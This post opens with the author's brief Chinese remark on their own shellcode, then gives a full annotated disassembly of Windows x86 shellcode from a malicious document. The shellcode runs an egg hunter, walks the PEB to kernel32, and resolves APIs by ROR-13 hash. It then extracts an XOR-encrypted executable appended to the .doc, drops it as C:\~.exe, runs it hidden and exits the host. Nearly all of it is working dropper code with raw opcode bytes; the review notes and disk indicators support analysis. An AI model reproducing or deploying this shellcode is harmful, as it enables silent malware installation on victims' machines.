偶是新手,这个ShellCode也没有什么新意,如果说有的话,就在API的查找上还算有点优点。



; Stage 1: egg hunter. Starting 0x20000 bytes past esi (what esi holds on entry
; is not visible in this listing), scan memory one byte at a time for the 4-byte
; marker 90 90 64 A1 -- i.e. "nop; nop; mov eax, fs:[..]", the first bytes of
; stage 2 at 00B8893E -- and jump to the SECOND copy found. Note that the
; immediate of the cmp at 00125B93 is itself a copy of those bytes, so this
; hunter can match its own code; which copy is skipped and which is executed
; depends on where esi points and is not determinable from this listing (the
; run shown lands in a heap copy at 00B88xxx).
; NOTE(review): the scan is unbounded and has no exception handler, so reaching
; an unmapped page before the second marker crashes the host process.
00125B88    33DB            xor     ebx, ebx                         ; ebx = markers seen so far
00125B8A    81C6 00000200   add     esi, 20000                       ; skip 128 KiB ahead of esi
00125B90    46              inc     esi                              ; advance one byte (dword read at any alignment)
00125B91    8B06            mov     eax, dword ptr [esi]
00125B93    3D 909064A1     cmp     eax, A1649090                    ; bytes 90 90 64 A1 = start of stage 2
00125B98  ^ 75 F6           jnz     short 00125B90
00125B9A    43              inc     ebx
00125B9B    83FB 02         cmp     ebx, 2                           ; ignore the first hit, take the second
00125B9E  ^ 75 F0           jnz     short 00125B90
00125BA0    FFE6            jmp     esi                              ; execute the marker in place (it is valid code)





; Stage 2 entry (the egg). Walks the PEB loader data to obtain the kernel32.dll
; image base without touching any import:
;   fs:[30h]        -> PEB
;   PEB+0Ch         -> PEB_LDR_DATA
;   Ldr+1Ch         -> InInitializationOrderModuleList.Flink (first entry's links)
;   lods            -> that entry's Flink = second entry's links
;   links+08h       -> DllBase (InInitializationOrderLinks sits at +10h and
;                      DllBase at +18h in LDR_DATA_TABLE_ENTRY)
; NOTE(review): this assumes kernel32.dll is the second module in initialization
; order. That holds on Windows XP (the annotated 7C800000h is an XP-era kernel32
; base) but not on later versions, where a different module (typically
; KernelBase.dll) sits in that slot and the hash lookups below would then
; resolve against the wrong image -- confirm before reusing this resolver.
00B8893E    90              nop                                    ; marker bytes searched for by stage 1
00B8893F    90              nop
00B88940    64:A1 30000000  mov     eax, dword ptr fs:[30]         ; eax = PEB
00B88946    8B40 0C         mov     eax, dword ptr [eax+C]         ; eax = PEB->Ldr
00B88949    8B70 1C         mov     esi, dword ptr [eax+1C]        ; esi = first init-order entry (links)
00B8894C    AD              lods    dword ptr [esi]                ; eax = its Flink = second entry; esi += 4
00B8894D    8B70 08         mov     esi, dword ptr [eax+8]         ; esi = DllBase of the second entry (7C800000h here)



; Locate the inline data area and build a 0x200-byte scratch table on the stack
; (edi = table base) that all later code addresses by fixed offsets. The
; jmp/call/pop pair is the usual position-independent trick: the call at
; 00B88BBF pushes the address of the bytes that follow it (00B88BC4), which is
; the data area dumped at the end of this listing, and 00B88955 pops it.
;
; Table layout (offsets from edi), as used by the code below:
;   +04  scratch dword: first the 000A2000h constant from the data area; it is
;        never read before ReadFile at 00B88AB7 overwrites it with the payload size
;   +08  kernel32 image base
;   +0C  -> L"c:\~$"       (temporary copy of the document)
;   +10  -> L"c:\~.exe"    (dropped executable, wide path)
;   +14  -> original document path (filled in by the stack search that follows)
;   +1C..+44  resolved kernel32 API addresses
;   +5C  payload buffer   +60 handle to C:\~$   +64 handle to C:\~.exe
;   +80  -> "c:\~.exe"    (ANSI, for WinExec)
;   +A0  bytes-transferred out-parameter shared by ReadFile/WriteFile
00B88950    E9 6A020000     jmp     00B88BBF                       ; -> call 00B88955, which pushes the data address
00B88955    58              pop     eax                            ; eax = start of data area (00B88BC4)
00B88956    81EC 00020000   sub     esp, 200                       ; reserve a 512-byte scratch table
00B8895C    8BFC            mov     edi, esp                       ; edi = table base for the rest of the shellcode
00B8895E    8B18            mov     ebx, dword ptr [eax]           ; 000A2000h, first dword of the data area
00B88960    895F 04         mov     dword ptr [edi+4], ebx
00B88963    8977 08         mov     dword ptr [edi+8], esi         ; kernel32 base
00B88966    83C0 04         add     eax, 4
00B88969    8947 0C         mov     dword ptr [edi+C], eax         ; L"c:\~$"
00B8896C    83C0 0C         add     eax, 0C                        ; skip the 12-byte wide string incl. terminator
00B8896F    8947 10         mov     dword ptr [edi+10], eax        ; L"c:\~.exe"
00B88972    83C0 12         add     eax, 12                        ; skip the 18-byte wide string incl. terminator
00B88975    8987 80000000   mov     dword ptr [edi+80], eax        ; "c:\~.exe" (ANSI)

;;;; Recover the path of the document from the host's stack.
; The shellcode is not told which file it came from, so it scans the stack for a
; UTF-16 string ending in ".doc" and walks back to its "X:\" prefix. The first
; match wins -- presumably the carrier document that the host is parsing, but
; any ".doc" path lying around on the stack would satisfy the search.
; NOTE(review): the scan walks downward from (esp XOR 0FFFFh) one byte at a time
; with no lower bound and no exception handler; if no matching string is found
; before the stack's guard page the host faults. The backward walk for ":\" is
; limited to 200 bytes, so longer directory paths are skipped over.
00B8897B    57              push    edi                          ; save table base (edi is reused as the scan cursor)
00B8897C    8BFC            mov     edi, esp
00B8897E    81F7 FFFF0000   xor     edi, 0FFFF                   ; flip the low 16 bits: start elsewhere in the same 64 KiB stack region
00B88984    4F              dec     edi
00B88985    4F              dec     edi
00B88986    4F              dec     edi
00B88987    4F              dec     edi                          ; outer loop entry: step back one byte
00B88988    813F 6F006300   cmp     dword ptr [edi], 63006F      ; L"oc" (bytes 6F 00 63 00)
00B8898E  ^ 75 F7           jnz     short 00B88987
00B88990    4F              dec     edi
00B88991    4F              dec     edi
00B88992    4F              dec     edi
00B88993    4F              dec     edi
00B88994    813F 2E006400   cmp     dword ptr [edi], 64002E      ; L".d" immediately before it -> L".doc"
00B8899A  ^ 75 EB           jnz     short 00B88987               ; not ".doc": resume the byte-wise scan
00B8899C    68 C8000000     push    0C8
00B889A1    59              pop     ecx                          ; ecx = 200: max bytes to walk back for the drive prefix
00B889A2    8BF7            mov     esi, edi
00B889A4    4E              dec     esi                          ; inner loop: one byte at a time
00B889A5    813E 3A005C00   cmp     dword ptr [esi], 5C003A      ; L":\"
00B889AB    74 04           je      short 00B889B1
00B889AD  ^ E2 F5           loopd   short 00B889A4
00B889AF  ^ EB D6           jmp     short 00B88987               ; no ":\" within 200 bytes: keep scanning the stack
00B889B1    4E              dec     esi
00B889B2    4E              dec     esi                          ; back up over the drive letter: esi -> L"X:\...\name.doc"
00B889B3    5F              pop     edi                          ; restore table base
00B889B4    8977 14         mov     dword ptr [edi+14], esi      ; table[+14] = document path
; Resolve the eleven kernel32 exports the payload needs. Each call passes
; (kernel32 base, 32-bit ROR-13 name hash) to the resolver at 00B88B6B and
; stores the returned address in the table, so no API name string ever appears
; in the shellcode. Argument order on the stack: hash at [ebp+8], base at [ebp+C].
; NOTE(review): the resolver has no failure path and returns whatever name hashes
; first to the requested value; nothing here validates the results before they
; are called through. A hash collision or a different module in the loader
; slot (see the PEB walk above) would silently redirect these calls.
00B889B7    FF77 08         push    dword ptr [edi+8]
00B889BA    68 EC97030C     push    0C0397EC                           ; hash("GlobalAlloc")
00B889BF    E8 A7010000     call    00B88B6B
00B889C4    8947 1C         mov     dword ptr [edi+1C], eax            ; table[+1C] = GlobalAlloc
00B889C7    FF77 08         push    dword ptr [edi+8]
00B889CA    68 F622B97C     push    7CB922F6                           ; hash("GlobalFree")
00B889CF    E8 97010000     call    00B88B6B
00B889D4    8947 20         mov     dword ptr [edi+20], eax            ; table[+20] = GlobalFree
00B889D7    FF77 08         push    dword ptr [edi+8]
00B889DA    68 BB17007C     push    7C0017BB                           ; hash("CreateFileW")
00B889DF    E8 87010000     call    00B88B6B
00B889E4    8947 24         mov     dword ptr [edi+24], eax            ; table[+24] = CreateFileW
00B889E7    FF77 08         push    dword ptr [edi+8]
00B889EA    68 FB97FD0F     push    0FFD97FB                           ; hash("CloseHandle")
00B889EF    E8 77010000     call    00B88B6B
00B889F4    8947 28         mov     dword ptr [edi+28], eax            ; table[+28] = CloseHandle
00B889F7    FF77 08         push    dword ptr [edi+8]
00B889FA    68 1665FA10     push    10FA6516                           ; hash("ReadFile")
00B889FF    E8 67010000     call    00B88B6B
00B88A04    8947 2C         mov     dword ptr [edi+2C], eax            ; table[+2C] = ReadFile
00B88A07    FF77 08         push    dword ptr [edi+8]
00B88A0A    68 1F790AE8     push    E80A791F                           ; hash("WriteFile")
00B88A0F    E8 57010000     call    00B88B6B
00B88A14    8947 30         mov     dword ptr [edi+30], eax            ; table[+30] = WriteFile
00B88A17    FF77 08         push    dword ptr [edi+8]
00B88A1A    68 3BB0FFC2     push    C2FFB03B                           ; hash("DeleteFileW")
00B88A1F    E8 47010000     call    00B88B6B  
00B88A24    8947 34         mov     dword ptr [edi+34], eax            ; table[+34] = DeleteFileW
00B88A27    FF77 08         push    dword ptr [edi+8]
00B88A2A    68 AC08DA76     push    76DA08AC                           ; hash("SetFilePointer")
00B88A2F    E8 37010000     call    00B88B6B
00B88A34    8947 38         mov     dword ptr [edi+38], eax            ; table[+38] = SetFilePointer
00B88A37    FF77 08         push    dword ptr [edi+8]
00B88A3A    68 98FE8A0E     push    0E8AFE98                           ; hash("WinExec")
00B88A3F    E8 27010000     call    00B88B6B
00B88A44    8947 3C         mov     dword ptr [edi+3C], eax            ; table[+3C] = WinExec
00B88A47    FF77 08         push    dword ptr [edi+8]
00B88A4A    68 7489EC99     push    99EC8974                           ; hash("CopyFileW")
00B88A4F    E8 17010000     call    00B88B6B
00B88A54    8947 40         mov     dword ptr [edi+40], eax            ; table[+40] = CopyFileW
00B88A57    FF77 08         push    dword ptr [edi+8]
00B88A5A    68 7ED8E273     push    73E2D87E                           ; hash("ExitProcess")
00B88A5F    E8 07010000     call    00B88B6B
00B88A64    8947 44         mov     dword ptr [edi+44], eax            ; table[+44] = ExitProcess

;****************************************************************************

; Drop phase, part 1: remove leftovers from a previous run, copy the document to
; C:\~$ and open that copy read-only. All calls are stdcall, so the pushes are
; the arguments in reverse order. No return value is checked anywhere in this
; phase -- a failed copy or open simply propagates an invalid handle onward.
00B88A67    FF77 10         push    dword ptr [edi+10]                 ; L"c:\~.exe"
00B88A6A    FF57 34         call    dword ptr [edi+34]                 ; DeleteFileW(L"c:\~.exe")
00B88A6D    FF77 0C         push    dword ptr [edi+C]                  ; L"c:\~$"
00B88A70    FF57 34         call    dword ptr [edi+34]                 ; DeleteFileW(L"c:\~$")
00B88A73    6A 00           push    0                                  ; bFailIfExists = FALSE
00B88A75    FF77 0C         push    dword ptr [edi+C]                  ; lpNewFileName = L"c:\~$"
00B88A78    FF77 14         push    dword ptr [edi+14]                 ; lpExistingFileName = document path found on the stack
00B88A7B    FF57 40         call    dword ptr [edi+40]                 ; CopyFileW: document -> C:\~$ (presumably because the original is still held open by the host)
00B88A7E    6A 00           push    0                                  ; hTemplateFile
00B88A80    68 80000000     push    80                                 ; FILE_ATTRIBUTE_NORMAL
00B88A85    6A 03           push    3                                  ; OPEN_EXISTING
00B88A87    6A 00           push    0                                  ; lpSecurityAttributes
00B88A89    6A 00           push    0                                  ; dwShareMode = 0
00B88A8B    68 00000080     push    80000000                           ; GENERIC_READ
00B88A90    FF77 0C         push    dword ptr [edi+C]                  ; L"c:\~$"
00B88A93    FF57 24         call    dword ptr [edi+24]                 ; CreateFileW
00B88A96    8947 60         mov     dword ptr [edi+60], eax            ; table[+60] = handle to C:\~$ (INVALID_HANDLE_VALUE on failure, unchecked)
; Drop phase, part 2: the carrier document has an encrypted PE appended to it:
;   [ ... document ... ][ payload, size bytes ][ size, 4-byte little-endian ]
; Read the trailing size dword, allocate a buffer, seek back size+4 from EOF and
; read the payload. The annotations from the captured run: size = 18BA5h,
; payload at 11400h, size dword at 29FA5h (11400h + 18BA5h).
; NOTE(review): size is taken straight from the file and neither GlobalAlloc nor
; ReadFile results are checked; a truncated or tampered size yields a NULL
; buffer or a partial read that the code below still decrypts and executes.
00B88A99    6A 02           push    2                                ; dwMoveMethod = FILE_END
00B88A9B    6A 00           push    0                                ; lpDistanceToMoveHigh
00B88A9D    6A FC           push    -4                               ; 4 bytes before EOF
00B88A9F    FF77 60         push    dword ptr [edi+60]
00B88AA2    FF57 38         call    dword ptr [edi+38]               ; SetFilePointer(h, -4, NULL, FILE_END): sample offset 29FA5h
00B88AA5    6A 00           push    0                                ; lpOverlapped
00B88AA7    8D9F A0000000   lea     ebx, dword ptr [edi+A0]
00B88AAD    53              push    ebx                              ; lpNumberOfBytesRead
00B88AAE    6A 04           push    4                                ; read 4 bytes (sample value: 18BA5h)
00B88AB0    8D5F 04         lea     ebx, dword ptr [edi+4]
00B88AB3    53              push    ebx                              ; into table[+4] (overwrites the 000A2000h stored there earlier)
00B88AB4    FF77 60         push    dword ptr [edi+60]
00B88AB7    FF57 2C         call    dword ptr [edi+2C]               ; ReadFile: payload size from the tail of C:\~$
00B88ABA    FF77 04         push    dword ptr [edi+4]                ; dwBytes = size
00B88ABD    6A 40           push    40                               ; GMEM_ZEROINIT
00B88ABF    FF57 1C         call    dword ptr [edi+1C]               ; GlobalAlloc
00B88AC2    8947 5C         mov     dword ptr [edi+5C], eax          ; table[+5C] = payload buffer (NULL on failure, unchecked)
00B88AC5    8B5F 04         mov     ebx, dword ptr [edi+4]
00B88AC8    83C3 04         add     ebx, 4
00B88ACB    F7D3            not     ebx
00B88ACD    43              inc     ebx                              ; ebx = -(size + 4), two's complement
00B88ACE    6A 02           push    2                                ; FILE_END
00B88AD0    6A 00           push    0
00B88AD2    53              push    ebx
00B88AD3    FF77 60         push    dword ptr [edi+60]
00B88AD6    FF57 38         call    dword ptr [edi+38]               ; SetFilePointer(h, -(size+4), NULL, FILE_END): start of payload (sample: 11400h)
00B88AD9    6A 00           push    0
00B88ADB    8D9F A0000000   lea     ebx, dword ptr [edi+A0]
00B88AE1    53              push    ebx
00B88AE2    FF77 04         push    dword ptr [edi+4]                ; nNumberOfBytesToRead = size
00B88AE5    FF77 5C         push    dword ptr [edi+5C]               ; buffer
00B88AE8    FF77 60         push    dword ptr [edi+60]
00B88AEB    FF57 2C         call    dword ptr [edi+2C]               ; ReadFile: encrypted payload into the buffer
00B88AEE    FF77 60         push    dword ptr [edi+60]
00B88AF1    FF57 28         call    dword ptr [edi+28]               ; CloseHandle(C:\~$)
00B88AF4    8B47 04         mov     eax, dword ptr [edi+4]           ; eax = size, counter for the decrypt loop
00B88AF7    8B5F 5C         mov     ebx, dword ptr [edi+5C]          ; ebx = buffer cursor

; Decrypt the payload in place: every byte XOR 81h, eax (= size) counting down
; to zero. A single-byte XOR key, so the embedded PE is trivially recoverable
; from the carrier document (the "MZ" header appears XORed with 81h at the
; payload offset).
; NOTE(review): if size is 0 the first `dec eax` wraps to FFFFFFFFh and the loop
; runs off the end of the buffer.
00B88AFA    8033 81         xor     byte ptr [ebx], 81             ; decrypt one byte
00B88AFD    43              inc     ebx
00B88AFE    48              dec     eax
00B88AFF    83F8 00         cmp     eax, 0
00B88B02  ^ 75 F6           jnz     short 00B88AFA

; Drop phase, part 3: write the decrypted PE to C:\~.exe, append 255 bytes
; starting at the original document path (presumably so the dropped executable
; can reopen the decoy document; the bytes after the path's terminator are
; whatever else sits on the host's stack), run it hidden, delete the temporary
; copy and terminate the host. C:\~.exe itself is left on disk, so C:\~$ and
; C:\~.exe are the file-system indicators this sample leaves behind.
00B88B04    6A 00           push    0                                  ; hTemplateFile
00B88B06    68 80000000     push    80                                 ; FILE_ATTRIBUTE_NORMAL
00B88B0B    6A 02           push    2                                  ; CREATE_ALWAYS
00B88B0D    6A 00           push    0                                  ; lpSecurityAttributes
00B88B0F    6A 00           push    0                                  ; dwShareMode = 0
00B88B11    68 00000040     push    40000000                           ; GENERIC_WRITE
00B88B16    FF77 10         push    dword ptr [edi+10]                 ; L"c:\~.exe"
00B88B19    FF57 24         call    dword ptr [edi+24]                 ; CreateFileW
00B88B1C    8947 64         mov     dword ptr [edi+64], eax            ; table[+64] = exe handle (unchecked)
00B88B1F    6A 00           push    0                                  ; lpOverlapped
00B88B21    8D9F A0000000   lea     ebx, dword ptr [edi+A0]
00B88B27    53              push    ebx                                ; lpNumberOfBytesWritten
00B88B28    FF77 04         push    dword ptr [edi+4]                  ; nNumberOfBytesToWrite = size
00B88B2B    FF77 5C         push    dword ptr [edi+5C]                 ; decrypted buffer
00B88B2E    50              push    eax                                ; hFile (eax still holds CreateFileW's result)
00B88B2F    FF57 30         call    dword ptr [edi+30]                 ; WriteFile: PE image
00B88B32    6A 00           push    0
00B88B34    8D9F A0000000   lea     ebx, dword ptr [edi+A0]
00B88B3A    53              push    ebx
00B88B3B    68 FF000000     push    0FF                                ; 255 bytes
00B88B40    FF77 14         push    dword ptr [edi+14]                 ; from the document path located on the stack
00B88B43    FF77 64         push    dword ptr [edi+64]                 ; exe handle
00B88B46    FF57 30         call    dword ptr [edi+30]                 ; WriteFile: append path (+ stack residue) to the exe
00B88B49    FF77 64         push    dword ptr [edi+64]
00B88B4C    FF57 28         call    dword ptr [edi+28]                 ; CloseHandle(exe)
00B88B4F    FF77 5C         push    dword ptr [edi+5C]
00B88B52    FF57 20         call    dword ptr [edi+20]                 ; GlobalFree(buffer)
00B88B55    6A 00           push    0                                  ; uCmdShow = SW_HIDE
00B88B57    FFB7 80000000   push    dword ptr [edi+80]                 ; "c:\~.exe" (ANSI)
00B88B5D    FF57 3C         call    dword ptr [edi+3C]                 ; WinExec
00B88B60    FF77 0C         push    dword ptr [edi+C]                  ; L"c:\~$"
00B88B63    FF57 34         call    dword ptr [edi+34]                 ; DeleteFileW: remove the temporary copy
00B88B66    6A 00           push    0                                  ; uExitCode
00B88B68    FF57 44         call    dword ptr [edi+44]                 ; ExitProcess: the host never returns from the exploit

;**********************************************************************
; Resolve an export of a PE image by name hash (the classic ROR-13 scheme).
;   [ebp+8]  = 32-bit hash of the wanted export name   -> edi
;   [ebp+C]  = image base (kernel32 here)               -> ebx
;   returns    eax = absolute address of the export; retn 8 (two stdcall args)
;   preserves  ebp, edi, esi;  CLOBBERS ebx, ecx, edx
; Walks the export directory: for name index i = 0, 1, 2, ... hash the
; NUL-terminated string at AddressOfNames[i] (hash = ror(hash,13) + byte); on a
; match take AddressOfNameOrdinals[i] and return base + AddressOfFunctions[ord].
; NOTE(review): there is no upper bound on i -- an unmatched hash walks past the
; end of the name table until it faults or a stray match occurs. Forwarded
; exports are not handled. The terminator test `cmp dh, dl` compares the
; sign-extended byte with its own high byte, so both 00h and FFh end a name;
; harmless for ASCII export names.
00B88B6B    55              push    ebp
00B88B6C    8BEC            mov     ebp, esp
00B88B6E    57              push    edi
00B88B6F    8B7D 08         mov     edi, dword ptr [ebp+8]            ; edi = wanted hash
00B88B72    8B5D 0C         mov     ebx, dword ptr [ebp+C]            ; ebx = image base (kernel32)
00B88B75    56              push    esi
00B88B76    8B73 3C         mov     esi, dword ptr [ebx+3C]           ; e_lfanew
00B88B79    8B741E 78       mov     esi, dword ptr [esi+ebx+78]       ; DataDirectory[EXPORT].VirtualAddress
00B88B7D    03F3            add     esi, ebx                          ; esi = IMAGE_EXPORT_DIRECTORY
00B88B7F    56              push    esi                               ; keep it for the ordinal/function lookups
00B88B80    8B76 20         mov     esi, dword ptr [esi+20]           ; AddressOfNames RVA
00B88B83    03F3            add     esi, ebx                          ; esi = name pointer table
00B88B85    33C9            xor     ecx, ecx
00B88B87    49              dec     ecx                               ; ecx = -1 so the first inc yields index 0
00B88B88    41              inc     ecx                               ; next name index
00B88B89    AD              lods    dword ptr [esi]                   ; eax = name RVA; esi -> next entry
00B88B8A    03C3            add     eax, ebx                          ; eax = name string
00B88B8C    56              push    esi                               ; save the table cursor; esi is reused as the hash
00B88B8D    33F6            xor     esi, esi                          ; hash = 0
00B88B8F    0FBE10          movsx   edx, byte ptr [eax]               ; next name byte, sign-extended into edx
00B88B92    3AF2            cmp     dh, dl                            ; terminator? (dh is 00h/FFh from the sign extension)
00B88B94    74 08           je      short 00B88B9E
00B88B96    C1CE 0D         ror     esi, 0D                           ; hash = ror(hash, 13) + byte
00B88B99    03F2            add     esi, edx
00B88B9B    40              inc     eax
00B88B9C  ^ EB F1           jmp     short 00B88B8F
00B88B9E    3BFE            cmp     edi, esi                          ; hash match?
00B88BA0    5E              pop     esi                               ; restore the table cursor (pop leaves flags intact)
00B88BA1  ^ 75 E5           jnz     short 00B88B88                    ; no: try the next name
00B88BA3    5A              pop     edx                               ; edx = export directory
00B88BA4    8BEB            mov     ebp, ebx                          ; ebp = image base (frame pointer reused; restored by the pop below)
00B88BA6    8B5A 24         mov     ebx, dword ptr [edx+24]           ; AddressOfNameOrdinals RVA
00B88BA9    03DD            add     ebx, ebp
00B88BAB    66:8B0C4B       mov     cx, word ptr [ebx+ecx*2]          ; ecx = ordinal (upper 16 bits are still the index's, i.e. 0 for index < 10000h)
00B88BAF    8B5A 1C         mov     ebx, dword ptr [edx+1C]           ; AddressOfFunctions RVA
00B88BB2    03DD            add     ebx, ebp
00B88BB4    8B048B          mov     eax, dword ptr [ebx+ecx*4]        ; function RVA
00B88BB7    03C5            add     eax, ebp                          ; eax = absolute address
00B88BB9    5E              pop     esi
00B88BBA    5F              pop     edi
00B88BBB    5D              pop     ebp
00B88BBC    C2 0800         retn    8
; Target of the jmp at 00B88950. The call pushes 00B88BC4 -- the address of the
; data area that immediately follows -- as its "return address", which the pop
; at 00B88955 then takes as the data pointer. Control never returns here.
00B88BBF    E8 91FDFFFF     call    00B88955

; Data area, reached via the call/pop above. Offsets from 00B88BC4:
;   +00  000A2000h    dword copied to table[+4]; later overwritten by the payload size read from the file
;   +04  L"c:\~$"     12 bytes incl. terminator       -> table[+0C]
;   +10  L"c:\~.exe"  18 bytes incl. terminator       -> table[+10]
;   +22  "c:\~.exe"   ANSI copy for WinExec           -> table[+80]  (terminator not shown in this dump)
; Together with the trailing 4-byte size and the XOR-81h payload in the carrier
; document, these two paths are the concrete artifacts to look for on disk.
00B88BC4  00 20 0A 00 63 00 3A 00 5C 00 7E 00 24 00 00 00  . ..c.:.\.~.$...
00B88BD4  63 00 3A 00 5C 00 7E 00 2E 00 65 00 78 00 65 00  c.:.\.~...e.x.e.
00B88BE4  00 00 63 3A 5C 7E 2E 65 78 65                    ..c:\~.exe